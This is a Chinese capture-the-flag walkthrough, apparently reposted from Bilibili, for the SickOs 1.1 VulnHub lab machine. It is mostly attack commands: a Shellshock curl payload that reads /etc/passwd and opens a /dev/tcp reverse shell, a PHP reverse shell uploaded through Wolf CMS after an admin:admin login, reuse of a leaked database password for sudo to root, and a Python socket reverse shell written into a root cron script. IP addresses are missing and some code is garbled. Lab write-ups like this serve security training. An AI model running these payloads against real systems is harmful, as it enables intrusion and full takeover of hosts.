【攻略鸭】SickOs1.1_VulnHub靶机攻略 全球最新
2023-06-29 20:21:12
来源:哔哩哔哩
本文内容纯属虚构,攻略鸭求关注点赞支持!
测试机IP地址:
(资料图)
外部信息收集
获取靶机地址
$ sudo arp-scan -l
端口扫描
Nmap结果:
22/tcp open ssh syn-ack ttl 64 OpenSSH Debian /tcp open http-proxy syn-ack ttl 64 Squid http proxy |_http-server-header: squid/|_http-title: ERROR: The requested URL could not be retrieved
squid
msf6 > search squidmsf6 > use auxiliary/scanner/http/squid_pivot_scanning> set RPORT 3128> set RHOSTS > set RANGE auxiliary(scanner/http/squid_pivot_scanning) > run[+] [] is alive.[+] [] seems open (HTTP 200, server header: 'Apache/ (Ubuntu)').[-] [] unknown Squid proxy error: 'ERR_UNSUP_REQ 0' (HTTP 501)
浏览器设置HTTP代理
HTTP Proxy 3128
且代理localhost和
/
burp配置上传流
/
系统export http_proxy=""(对fuff部分有效,对cURL有效,对nmap、nikto、浏览器未生效)
可访问/
目录枚举
ffuf -w /usr/share/wordlists/dirbuster/ -u /FUZZ -e .php,.txt,.html -c -ic -x /ffuf -w /usr/share/wordlists/dirb/ -u http://localhost/FUZZ -e .php,.txt,.html -c -ic -x
结果:
connect [Status: 200,index [Status: 200, [Status: 200, [Status: 200,robots [Status: 200,/cgi-bin/ : *Disallow: /Dissalow: /wolfcmsffuf -w /usr/share/wordlists/dirb/ -u http://localhost/cgi-bin/FUZZ -e .php,.txt,.html -c -ic -x status [Status: 200,
wolfcms
访问/wolfcms/发现是博客文章管理osted by Administrator$ searchsploit wolfcmsWolfcms - Cross-Site Request Forgery / Cross-Site Scripting | php/webapps/ - Cross-Site Request Forgery | php/webapps/ - Open Redirection | php/webapps/$ searchsploit wolfWolf CMS - Arbitrary File Upload / Execution | php/webapps/ CMS - Multiple Vulnerabilities | php/webapps/ CMS - Multiple Vulnerabilities | php/webapps/ CMS - Arbitrary File Upload | php/webapps/ CMS - Arbitrary File Upload (Metasploit) | php/remote/$ searchsploit -m 44421/wolfcms/?/admin/login$ searchsploit -m 38000/wolfcms/?/admin/plugin/file_manager/browse/
漏洞利用
破壳漏洞
验证:
$ curl -H "user-agent: () { : ;};echo;echo;/bin/bash -c 'cat /etc/passwd'" /cgi-bin/status -x root:x:0:0:root:/root:/bin/bashsickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
getshell:
nc -nvlp 1233curl -H "user-agent: () { : ;};echo;echo;/bin/bash -i &>/dev/tcp//1233 <&1" /cgi-bin/status -x
2.弱口令登录Wolf CMS并上传PHP reverse shell
使用admin:admin弱口令登录:
Wolf CMS :AministratorUsername:admin
上传PHP reverse shell:
点Files标签,在/wolfcms/public/目录下创建php-reverse-shell:,点权限改为777$ nc -nvlp 1234$ nc -nvlp 2345访问:/wolfcms/public/$ whoamiwww-data$ bash -c "bash -i >& /dev/tcp//2345 0>&1"
权限提升
$ python -c 'import pty; ("/bin/bash")'
1.密码重用,sudo提权
/var/www/wolfcms/:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');define('DB_USER', 'root');define('DB_PASS', 'john@123');
密码重用:
$ su sickosPassword: john@123sudo
sudo提权:
$ sudo -l (ALL : ALL) ALLsickos@SickOs:~$ sudo suroot@SickOs:~#
2.定时任务,python文件可写
www-data@SickOs:/var/www$ ls -al-rwxrwxrwx 1 root root 109 Dec 5 2015 $ cat #!/usr/bin/pythonprint "I Try to connect things very frequently\n"print "You may want to try my services"$ ls -alhR /etc/cron*/etc/:-rw-r--r-- 1 root root 102 Jun 20 2012 .placeholder-rw-r--r-- 1 root root 52 Dec 5 2015 automate-rw-r--r-- 1 root root 544 Jul 2 2015 php5$ cat /etc//automate* * * * * root /usr/bin/python /var/www/
改内容为
#!/usr/bin/pythonimport socket,subprocess,oss=(_INET,_STREAM)(("",1222))((),0)((),1)((),2)p=(["/bin/sh","-i"])# iduid=0(root) gid=0(root) groups=0(root)
其他
flag
# cat a*If you are viewing this!!ROOT!You have Succesfully completed for Trying
疑问求助
代理配置未完全理解,求教此题如何配置proxychains代理?
关键词:
